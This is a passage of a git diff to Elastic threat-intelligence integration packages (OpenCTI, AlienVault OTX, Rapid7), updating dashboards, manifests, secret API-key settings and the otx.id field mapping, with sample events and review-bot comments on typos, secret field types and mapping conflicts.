"6ce0295e-be7c-4411-8e59-ee82dc5c7abb", + "name": "cdde7ea0-3ad8-439e-8f31-769f1c1db33a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cab835da-4067-46cf-99f5-b080565b773d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e8544f14-3915-41f2-a92e-c948a70c9cb0", "type": "index-pattern" } ], @@ -1578,7 +2157,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "6ce0295e-be7c-4411-8e59-ee82dc5c7abb", + "index": "cdde7ea0-3ad8-439e-8f31-769f1c1db33a", "key": "event.dataset", "negate": false, "params": { 
@@ -1591,6 +2170,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "cab835da-4067-46cf-99f5-b080565b773d", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "e8544f14-3915-41f2-a92e-c948a70c9cb0", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], 
@@ -1639,19 +2262,53 @@ "panelIndex": "a052a7e4-d3c9-4d11-a168-8d4cbb04433b", "title": "Indicators by type", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" + }, + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "fontSize": 12, + "markdown": "### Navigation\n\n**[OpenCTI Overview](/app/dashboards#/view/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd)** \n[OpenCTI Tags \u0026 Quality](/app/dashboards#/view/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd) \n[OpenCTI Ingestion](/app/dashboards#/view/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624) \n\n[Integrations Page](/app/integrations/detail/ti_opencti/overview)\n\n### Overview\n\nThis dashboard provides an overview of current indicator data ingested by the OpenCTI integration.\n\nIt also provides breakdowns by provider and indicator type.\n\nThe availability of fields that are specific to particular indicator types can be understood by looking at the \"No oberservables data\" and \"No ECS indicator detail\" metrics. 
When an indicator in OpenCTI has any related observable object, details from the observable will be stored, and whenever possible, copied to relevant ECS fields.", + "openLinksInNewTab": false + }, + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 39, + "i": "8878f9df-1575-4ca8-83a8-0ad8f1ffb968", + "w": 10, + "x": 0, + "y": 39 + }, + "panelIndex": "8878f9df-1575-4ca8-83a8-0ad8f1ffb968", + "title": "", + "type": "visualization", + "version": "8.10.1" } ], "timeRestore": false, "title": "[Logs OpenCTI] Overview", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-29T17:01:49.130Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-23T10:28:59.397Z", "id": "ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -1660,7 +2317,17 @@ }, { "id": "logs-*", - "name": "bfdc79c8-e578-4778-b1e0-ef06c7c10a3a:5131be68-a318-4ea6-b0d3-ff13d60a044b", + "name": "bfdc79c8-e578-4778-b1e0-ef06c7c10a3a:d958d904-2e66-47f9-835d-d7d4274bba60", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "bfdc79c8-e578-4778-b1e0-ef06c7c10a3a:f128baf7-1873-4c4f-ac59-6babd6b3570c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "bfdc79c8-e578-4778-b1e0-ef06c7c10a3a:e74cb15a-9673-4c5d-ab61-eef4b0d6e122", "type": "index-pattern" }, { @@ -1670,7 +2337,17 @@ }, { "id": "logs-*", - "name": "d6bcf611-47b6-4470-a3f4-1627237dafec:914c9b0f-b5f0-4297-9bc3-464839e5f655", + "name": "d6bcf611-47b6-4470-a3f4-1627237dafec:a87bb3c1-70cd-4f25-bff2-522111d3594f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d6bcf611-47b6-4470-a3f4-1627237dafec:15cc137c-faac-4c2b-8839-443fcf171187", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d6bcf611-47b6-4470-a3f4-1627237dafec:a0f30b01-9408-4857-b68b-23210efa7594", "type": "index-pattern" }, { 
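Review bot: The markdown panel text added in this hunk spells the metric name as `"No oberservables data"`, which is presumably meant to be `"No observables data"`; since the sentence tells the reader to locate that metric by name, the string should match the metric panel's title exactly (that panel is outside this hunk). The `[OpenCTI Ingestion](/app/dashboards#/view/ti_opencti-274cda10-...)` link points at a saved object not shown in this diff; the manifest hunk later in the change adds a matching screenshot, so it likely exists, but confirm the dashboard ships in this package version so the link does not dead-end after install.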
@@ -1680,7 +2357,17 @@ }, { "id": "logs-*", - "name": "1768437b-561b-4346-8d9f-9194ce3ea104:e43361e4-f810-40fb-aab2-c35c5aefce8c", + "name": "1768437b-561b-4346-8d9f-9194ce3ea104:06326156-48e6-48bc-a6e4-1dd5bc5995d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1768437b-561b-4346-8d9f-9194ce3ea104:4df969ba-a380-437b-8668-2163cc9da588", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1768437b-561b-4346-8d9f-9194ce3ea104:9fc159c5-2720-47d9-bed0-105dbbee75c5", "type": "index-pattern" }, { @@ -1690,7 +2377,17 @@ }, { "id": "logs-*", - "name": "d9612960-6f48-4cd5-9e90-935f9104cff4:5adfe022-e45e-4f3c-be23-7a888352b091", + "name": "d9612960-6f48-4cd5-9e90-935f9104cff4:39604f43-aabf-4abd-ae6d-f63d5990afe4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d9612960-6f48-4cd5-9e90-935f9104cff4:7bef3ba6-908e-42c7-b783-dee88aa984e4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d9612960-6f48-4cd5-9e90-935f9104cff4:e148e4b0-9ea8-426e-9bb2-cf09d8576934", "type": "index-pattern" }, { @@ -1700,7 +2397,17 @@ }, { "id": "logs-*", - "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:6205c2b0-b0ff-4cd5-82fa-fce956dfcb62", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:6f3addee-bc85-4c90-8833-4bba92c2cab8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:4734d596-5593-4e0a-934f-fa5220511c35", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:4b974280-cf5e-4b9a-b791-967579a4b637", "type": "index-pattern" }, { 
@@ -1710,7 +2417,17 @@ }, { "id": "logs-*", - "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:4d21dc65-7171-4d32-bd09-c2cd0c802410", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:482b8572-524f-49a5-a143-57047f20d2a3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:9a70ca5b-4947-413d-9646-afd2d77296f9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:57847309-3c4e-44a5-8167-8f069fbf4850", "type": "index-pattern" }, { @@ -1720,7 +2437,17 @@ }, { "id": "logs-*", - "name": "fbf92495-4189-4b4a-9658-f21a129f6c61:22fe9f85-a46b-40bd-b670-9a1ca58f6c85", + "name": "fbf92495-4189-4b4a-9658-f21a129f6c61:8e63b1e7-d256-4a41-90bd-3153d600965c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fbf92495-4189-4b4a-9658-f21a129f6c61:ce2fbb75-d839-4e31-bafb-5ab61eacd8b8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fbf92495-4189-4b4a-9658-f21a129f6c61:61e09305-5c8d-4792-bbd3-7f0d44d6c787", "type": "index-pattern" }, { @@ -1730,7 +2457,17 @@ }, { "id": "logs-*", - "name": "356247a9-56a9-40e2-b965-d30697b9d352:f1983067-4b63-4ac8-a461-8a78fbd9473f", + "name": "356247a9-56a9-40e2-b965-d30697b9d352:7294212a-1593-4d40-9dc2-806ccd46f08f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "356247a9-56a9-40e2-b965-d30697b9d352:4a5daa1c-8c0e-49e7-a6e1-37076e7b8465", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "356247a9-56a9-40e2-b965-d30697b9d352:7349ab95-9a05-458c-939d-3e47d01a302f", "type": "index-pattern" }, { 
@@ -1740,7 +2477,17 @@ }, { "id": "logs-*", - "name": "d2267d11-6549-45b4-9fdc-a386e0315a61:ead48616-9d2d-4c33-9385-804b685d6a36", + "name": "d2267d11-6549-45b4-9fdc-a386e0315a61:8a675c52-4bf2-4d8d-8c31-17dd7efe3ed1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d2267d11-6549-45b4-9fdc-a386e0315a61:58cef302-fe2e-41a6-9e3d-2a7dc474f4a3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d2267d11-6549-45b4-9fdc-a386e0315a61:df7b758f-bdbf-401f-9c90-ffb85e97c0e0", "type": "index-pattern" }, { @@ -1750,7 +2497,17 @@ }, { "id": "logs-*", - "name": "7f6b8ea1-278b-4846-8287-017b6cd3d11d:e00f2f4b-df3c-4691-a7e4-b15f59296698", + "name": "7f6b8ea1-278b-4846-8287-017b6cd3d11d:d26b8155-87a7-41fc-af12-d35f67e7be1e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f6b8ea1-278b-4846-8287-017b6cd3d11d:b61f81e6-f978-427e-a178-3d171c1b3fbe", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f6b8ea1-278b-4846-8287-017b6cd3d11d:09a0dcdd-ec16-42a0-85c1-458fa441e030", "type": "index-pattern" }, { @@ -1760,7 +2517,17 @@ }, { "id": "logs-*", - "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:b4dd4b69-e286-4f84-95fa-227acb918a10", + "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:87a3a6b8-64bf-4f2a-a150-63d9451872d7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:2262e58c-3592-4071-8532-e74c01701ba0", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:a189dc93-499b-44d8-863f-fd86b64beb7d", "type": "index-pattern" }, { 
@@ -1770,7 +2537,17 @@ }, { "id": "logs-*", - "name": "a052a7e4-d3c9-4d11-a168-8d4cbb04433b:6ce0295e-be7c-4411-8e59-ee82dc5c7abb", + "name": "a052a7e4-d3c9-4d11-a168-8d4cbb04433b:cdde7ea0-3ad8-439e-8f31-769f1c1db33a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a052a7e4-d3c9-4d11-a168-8d4cbb04433b:cab835da-4067-46cf-99f5-b080565b773d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a052a7e4-d3c9-4d11-a168-8d4cbb04433b:e8544f14-3915-41f2-a92e-c948a70c9cb0", "type": "index-pattern" }, { @@ -1784,5 +2561,6 @@ "type": "index-pattern" } ], - "type": "dashboard" -} + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_opencti/manifest.yml b/packages/ti_opencti/manifest.yml index af6924de45e..41b92e3bc3b 100644 --- a/packages/ti_opencti/manifest.yml +++ b/packages/ti_opencti/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: ti_opencti title: OpenCTI -version: "1.0.1" +version: "2.1.0" description: "Ingest threat intelligence indicators from OpenCTI with Elastic Agent." type: integration source: @@ -11,17 +11,21 @@ categories: - threat_intel conditions: kibana: - version: "^8.9.0" + version: "^8.12.0" screenshots: - src: /img/screenshot1.png title: "Dashboard: OpenCTI Overview" - size: 1280x1323 + size: 1280x1329 type: image/png - src: /img/screenshot2.png title: "Dashboard: OpenCTI Tags & Quality" - size: 1280x1323 + size: 1280x1329 type: image/png - src: /img/screenshot3.png + title: "Dashboard: OpenCTI Ingestion" + size: 1280x1329 + type: image/png + - src: /img/screenshot4.png title: "Add OpenCTI integration" size: 1268x1323 type: image/png @@ -53,6 +57,7 @@ policy_templates: multi: false required: false show_user: true + secret: true - name: oauth2 type: yaml title: OAuth2 Configuration diff --git a/packages/ti_otx/changelog.yml b/packages/ti_otx/changelog.yml index 30e4f3ac1a0..f9f9c620b70 100644 --- a/packages/ti_otx/changelog.yml 
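Review bot: In the `@@ -53,6 +57,7 @@ policy_templates:` hunk, `secret: true` is added without a matching `type: password`, whereas the ti_otx manifests in this same change switch `type: text` to `type: password` alongside `secret: true`; the variable's `name` and `type` lines sit just above the hunk, so if it is still `type: text` it will be stored as a Fleet secret but still rendered unmasked in the policy editor. The same applies to the rapid7 hunk at `@@ -96,6 +96,7 @@ policy_templates:`; if both variables are already `type: password`, nothing to change. The `kibana.version` bump to `^8.12.0` earlier in this file presumably exists because `secret: true` needs that Kibana version; a one-line comment next to the constraint, e.g. `# ^8.12.0 required for secret: true`, would keep the next maintainer from lowering it.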
+++ b/packages/ti_otx/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.24.1" + changes: + - description: Fix type-mapping inconsistency for `otx.id` field. + type: bugfix + link: https://github.com/elastic/integrations/pull/9308 +- version: "1.24.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.23.2" changes: - description: Changed owners diff --git a/packages/ti_otx/data_stream/pulses_subscribed/_dev/test/pipeline/test-otx-pulses-subscribed-json.log-expected.json b/packages/ti_otx/data_stream/pulses_subscribed/_dev/test/pipeline/test-otx-pulses-subscribed-json.log-expected.json index 464e6a9f90b..1ea8e5b9aad 100644 --- a/packages/ti_otx/data_stream/pulses_subscribed/_dev/test/pipeline/test-otx-pulses-subscribed-json.log-expected.json +++ b/packages/ti_otx/data_stream/pulses_subscribed/_dev/test/pipeline/test-otx-pulses-subscribed-json.log-expected.json @@ -18,7 +18,7 @@ "otx": { "count": 1, "created": "2023-08-09T05:05:15.000Z", - "id": 3735598369, + "id": "3735598369", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { @@ -70,7 +70,7 @@ "otx": { "count": 1, "created": "2023-08-09T05:05:15.000Z", - "id": 3735598370, + "id": "3735598370", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { @@ -121,7 +121,7 @@ "count": 1, "created": "2023-08-09T05:05:15.000Z", "expiration": "2023-09-07T00:00:00.000Z", - "id": 3450933144, + "id": "3450933144", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { @@ -170,7 +170,7 @@ "otx": { "count": 1, "created": "2023-08-09T05:05:15.000Z", - "id": 3735598395, + "id": "3735598395", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { @@ -224,7 +224,7 @@ "otx": { "count": 1, "created": "2023-08-09T05:05:15.000Z", - "id": 3735598410, + "id": "3735598410", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { 
@@ -274,7 +274,7 @@ "otx": { "count": 1, "created": "2023-08-09T05:05:15.000Z", - "id": 3735598429, + "id": "3735598429", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { diff --git a/packages/ti_otx/data_stream/pulses_subscribed/elasticsearch/ingest_pipeline/default.yml b/packages/ti_otx/data_stream/pulses_subscribed/elasticsearch/ingest_pipeline/default.yml index 0fe8c1691cf..2c10fabe8fe 100644 --- a/packages/ti_otx/data_stream/pulses_subscribed/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ti_otx/data_stream/pulses_subscribed/elasticsearch/ingest_pipeline/default.yml @@ -101,7 +101,7 @@ processors: if: "ctx.otx?.expiration != null" - convert: field: otx.id - type: long + type: string if: "ctx.otx?.id != null" tag: convert_otx_id - convert: diff --git a/packages/ti_otx/data_stream/pulses_subscribed/fields/fields.yml b/packages/ti_otx/data_stream/pulses_subscribed/fields/fields.yml index 8bd47549ec9..2cef0721657 100644 --- a/packages/ti_otx/data_stream/pulses_subscribed/fields/fields.yml +++ b/packages/ti_otx/data_stream/pulses_subscribed/fields/fields.yml @@ -5,7 +5,7 @@ fields: - name: id - type: long + type: keyword description: > The ID of the indicator. diff --git a/packages/ti_otx/data_stream/pulses_subscribed/manifest.yml b/packages/ti_otx/data_stream/pulses_subscribed/manifest.yml index 9c48dba8770..6ec157631ca 100644 --- a/packages/ti_otx/data_stream/pulses_subscribed/manifest.yml +++ b/packages/ti_otx/data_stream/pulses_subscribed/manifest.yml @@ -24,12 +24,13 @@ streams: show_user: true default: 5m - name: api_key - type: text + type: password title: API Key multi: false required: true show_user: true description: The Alienvault OTX API Key + secret: true - name: first_interval type: text title: First Interval diff --git a/packages/ti_otx/data_stream/pulses_subscribed/sample_event.json b/packages/ti_otx/data_stream/pulses_subscribed/sample_event.json index 3536db11a61..e96d8cc2c2d 100644 
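Review bot: In the `fields.yml` hunk, changing `otx.id` from `long` to `keyword` is a mapping type change, so backing indices written under the previous package version keep `long` while indices created after upgrade get `keyword`; until the old indices age out, the `logs-*` data view is likely to report a field-type conflict for `otx.id` and aggregations over it will not merge. The changelog entry only says "Fix type-mapping inconsistency for `otx.id` field."; a sentence there or in the README describing this transitional conflict would help operators. The `convert` processor change to `type: string` in the ingest-pipeline hunk above and the `latest_ioc` transform fields hunk later in the diff are the other parts of the same change.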
--- a/packages/ti_otx/data_stream/pulses_subscribed/sample_event.json +++ b/packages/ti_otx/data_stream/pulses_subscribed/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2023-08-08T05:05:15.000Z", "agent": { - "ephemeral_id": "613b36ba-6bb7-4e3d-9a90-b5e6ec5a860c", - "id": "8130bdff-3530-4540-8c03-ba091c47a24f", + "ephemeral_id": "98babf94-9cf4-45af-aef8-2d57d61d9876", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_otx.pulses_subscribed", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "8130bdff-3530-4540-8c03-ba091c47a24f", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "snapshot": false, - "version": "8.11.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", 
@@ -26,7 +26,7 @@ "threat" ], "dataset": "ti_otx.pulses_subscribed", - "ingested": "2023-12-22T11:25:24Z", + "ingested": "2024-03-08T02:54:50Z", "kind": "enrichment", "original": "{\"content\":\"\",\"count\":2,\"created\":\"2023-08-08T05:05:15\",\"description\":\"\",\"expiration\":null,\"id\":3454375108,\"indicator\":\"pinup-casino-tr.site\",\"is_active\":1,\"prefetch_pulse_ids\":false,\"pulse_raw\":\"{\\\"adversary\\\":\\\"\\\",\\\"attack_ids\\\":[\\\"T1531\\\",\\\"T1059\\\",\\\"T1566\\\"],\\\"author_name\\\":\\\"SampleUser\\\",\\\"created\\\":\\\"2023-08-22T09:43:18.855000\\\",\\\"description\\\":\\\"\\\",\\\"extract_source\\\":[],\\\"id\\\":\\\"64e38336d783f91d6948a7b1\\\",\\\"industries\\\":[],\\\"malware_families\\\":[\\\"WHIRLPOOL\\\"],\\\"modified\\\":\\\"2023-08-22T09:43:18.855000\\\",\\\"more_indicators\\\":false,\\\"name\\\":\\\"Sample Pulse\\\",\\\"public\\\":1,\\\"references\\\":[\\\"https://www.cisa.gov/news-events/analysis-reports/ar23-230a\\\"],\\\"revision\\\":1,\\\"tags\\\":[\\\"cisa\\\",\\\"backdoor\\\",\\\"whirlpool\\\",\\\"malware\\\"],\\\"targeted_countries\\\":[],\\\"tlp\\\":\\\"white\\\"}\",\"role\":null,\"t\":0,\"t2\":0.0050694942474365234,\"t3\":2.7960586547851562,\"title\":\"\",\"type\":\"domain\"}", "type": [ @@ -40,7 +40,7 @@ "count": 2, "created": "2023-08-08T05:05:15.000Z", "expiration": "2023-08-13T05:05:15.000Z", - "id": 3454375108, + "id": "3454375108", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { diff --git a/packages/ti_otx/data_stream/threat/manifest.yml b/packages/ti_otx/data_stream/threat/manifest.yml index 446e944cb93..23662d53ef4 100644 --- a/packages/ti_otx/data_stream/threat/manifest.yml +++ b/packages/ti_otx/data_stream/threat/manifest.yml 
@@ -42,12 +42,13 @@ streams: show_user: true default: 5m - name: api_token - type: text + type: password title: API Token multi: false required: true show_user: true description: The Alienvault OTX API token + secret: true - name: first_interval type: text title: First Interval diff --git a/packages/ti_otx/data_stream/threat/sample_event.json b/packages/ti_otx/data_stream/threat/sample_event.json index 08c2f8c6cbb..568c834280a 100644 --- a/packages/ti_otx/data_stream/threat/sample_event.json +++ b/packages/ti_otx/data_stream/threat/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2023-09-26T06:02:18.318Z", + "@timestamp": "2024-03-08T02:55:33.690Z", "agent": { - "ephemeral_id": "7e240822-d6d7-44de-a74b-02c744232f29", - "id": "ce0bce5a-6e51-4f74-abca-79147f80e169", + "ephemeral_id": "8edc1f21-05cd-4fa5-aadc-66e64f44856a", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_otx.threat", @@ -16,18 +16,18 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "ce0bce5a-6e51-4f74-abca-79147f80e169", - "snapshot": true, - "version": "8.11.0" + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", + "snapshot": false, + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-09-26T06:02:18.318Z", + "created": "2024-03-08T02:55:33.690Z", "dataset": "ti_otx.threat", - "ingested": "2023-09-26T06:02:21Z", + "ingested": "2024-03-08T02:55:45Z", "kind": "enrichment", "original": "{\"count\":40359,\"next\":\"https://otx.alienvault.com/api/v1/indicators/export?types=domain%2CIPv4%2Chostname%2Curl%2CFileHash-SHA256\\u0026modified_since=2020-11-29T01%3A10%3A00+00%3A00\\u0026page=2\",\"previous\":null,\"results\":{\"content\":\"\",\"description\":null,\"id\":1251,\"indicator\":\"info.3000uc.com\",\"title\":null,\"type\":\"hostname\"}}", "type": [ @@ -51,4 +51,4 @@ } } } -} +} \ No newline at end of file 
diff --git a/packages/ti_otx/docs/README.md b/packages/ti_otx/docs/README.md index 12ac13d1d16..d4989dc3553 100644 --- a/packages/ti_otx/docs/README.md +++ b/packages/ti_otx/docs/README.md @@ -102,13 +102,13 @@ An example event for `threat` looks as following: ```json { - "@timestamp": "2023-09-26T06:02:18.318Z", + "@timestamp": "2024-03-08T02:55:33.690Z", "agent": { - "ephemeral_id": "7e240822-d6d7-44de-a74b-02c744232f29", - "id": "ce0bce5a-6e51-4f74-abca-79147f80e169", + "ephemeral_id": "8edc1f21-05cd-4fa5-aadc-66e64f44856a", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_otx.threat", @@ -119,18 +119,18 @@ An example event for `threat` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "ce0bce5a-6e51-4f74-abca-79147f80e169", - "snapshot": true, - "version": "8.11.0" + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", + "snapshot": false, + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-09-26T06:02:18.318Z", + "created": "2024-03-08T02:55:33.690Z", "dataset": "ti_otx.threat", - "ingested": "2023-09-26T06:02:21Z", + "ingested": "2024-03-08T02:55:45Z", "kind": "enrichment", "original": "{\"count\":40359,\"next\":\"https://otx.alienvault.com/api/v1/indicators/export?types=domain%2CIPv4%2Chostname%2Curl%2CFileHash-SHA256\\u0026modified_since=2020-11-29T01%3A10%3A00+00%3A00\\u0026page=2\",\"previous\":null,\"results\":{\"content\":\"\",\"description\":null,\"id\":1251,\"indicator\":\"info.3000uc.com\",\"title\":null,\"type\":\"hostname\"}}", "type": [ @@ -155,7 +155,6 @@ An example event for `threat` looks as following: } } } - ``` ### Pulses Subscribed (Recommended) 
@@ -233,7 +232,7 @@ The following subscriptions are included by this API: | otx.created | | date | | otx.description | | keyword | | otx.expiration | | date | -| otx.id | The ID of the indicator. | long | +| otx.id | The ID of the indicator. | keyword | | otx.indicator | | keyword | | otx.is_active | | integer | | otx.prefetch_pulse_ids | | boolean | @@ -291,11 +290,11 @@ An example event for `pulses_subscribed` looks as following: { "@timestamp": "2023-08-08T05:05:15.000Z", "agent": { - "ephemeral_id": "613b36ba-6bb7-4e3d-9a90-b5e6ec5a860c", - "id": "8130bdff-3530-4540-8c03-ba091c47a24f", + "ephemeral_id": "98babf94-9cf4-45af-aef8-2d57d61d9876", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.11.0" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_otx.pulses_subscribed", @@ -306,9 +305,9 @@ An example event for `pulses_subscribed` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "8130bdff-3530-4540-8c03-ba091c47a24f", + "id": "f29e7d89-991e-4f0a-838f-9c2eb93d876e", "snapshot": false, - "version": "8.11.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", 
@@ -316,7 +315,7 @@ An example event for `pulses_subscribed` looks as following: "threat" ], "dataset": "ti_otx.pulses_subscribed", - "ingested": "2023-12-22T11:25:24Z", + "ingested": "2024-03-08T02:54:50Z", "kind": "enrichment", "original": "{\"content\":\"\",\"count\":2,\"created\":\"2023-08-08T05:05:15\",\"description\":\"\",\"expiration\":null,\"id\":3454375108,\"indicator\":\"pinup-casino-tr.site\",\"is_active\":1,\"prefetch_pulse_ids\":false,\"pulse_raw\":\"{\\\"adversary\\\":\\\"\\\",\\\"attack_ids\\\":[\\\"T1531\\\",\\\"T1059\\\",\\\"T1566\\\"],\\\"author_name\\\":\\\"SampleUser\\\",\\\"created\\\":\\\"2023-08-22T09:43:18.855000\\\",\\\"description\\\":\\\"\\\",\\\"extract_source\\\":[],\\\"id\\\":\\\"64e38336d783f91d6948a7b1\\\",\\\"industries\\\":[],\\\"malware_families\\\":[\\\"WHIRLPOOL\\\"],\\\"modified\\\":\\\"2023-08-22T09:43:18.855000\\\",\\\"more_indicators\\\":false,\\\"name\\\":\\\"Sample Pulse\\\",\\\"public\\\":1,\\\"references\\\":[\\\"https://www.cisa.gov/news-events/analysis-reports/ar23-230a\\\"],\\\"revision\\\":1,\\\"tags\\\":[\\\"cisa\\\",\\\"backdoor\\\",\\\"whirlpool\\\",\\\"malware\\\"],\\\"targeted_countries\\\":[],\\\"tlp\\\":\\\"white\\\"}\",\"role\":null,\"t\":0,\"t2\":0.0050694942474365234,\"t3\":2.7960586547851562,\"title\":\"\",\"type\":\"domain\"}", "type": [ @@ -330,7 +329,7 @@ An example event for `pulses_subscribed` looks as following: "count": 2, "created": "2023-08-08T05:05:15.000Z", "expiration": "2023-08-13T05:05:15.000Z", - "id": 3454375108, + "id": "3454375108", "is_active": 1, "prefetch_pulse_ids": false, "pulse": { diff --git a/packages/ti_otx/elasticsearch/transform/latest_ioc/fields/fields.yml b/packages/ti_otx/elasticsearch/transform/latest_ioc/fields/fields.yml index a113d8baba5..f39d7ddc81e 100644 --- a/packages/ti_otx/elasticsearch/transform/latest_ioc/fields/fields.yml +++ b/packages/ti_otx/elasticsearch/transform/latest_ioc/fields/fields.yml 
@@ -161,7 +161,7 @@ fields: - name: id - type: long + type: keyword description: > The ID of the indicator. diff --git a/packages/ti_otx/manifest.yml b/packages/ti_otx/manifest.yml index b35f5f27c90..1364cc0a303 100644 --- a/packages/ti_otx/manifest.yml +++ b/packages/ti_otx/manifest.yml @@ -1,13 +1,13 @@ name: ti_otx title: AlienVault OTX -version: "1.23.2" +version: "1.24.1" description: Ingest threat intelligence indicators from AlienVault Open Threat Exchange (OTX) with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.10.3 + version: ^8.12.0 icons: - src: /img/otx.svg title: Alienvault OTX diff --git a/packages/ti_rapid7_threat_command/changelog.yml b/packages/ti_rapid7_threat_command/changelog.yml index effb59f02a3..3ea56097fbe 100644 --- a/packages/ti_rapid7_threat_command/changelog.yml +++ b/packages/ti_rapid7_threat_command/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.14.1" changes: - description: Changed owners diff --git a/packages/ti_rapid7_threat_command/manifest.yml b/packages/ti_rapid7_threat_command/manifest.yml index d96ae57b8ad..df50c083339 100644 --- a/packages/ti_rapid7_threat_command/manifest.yml +++ b/packages/ti_rapid7_threat_command/manifest.yml @@ -1,14 +1,14 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: ti_rapid7_threat_command 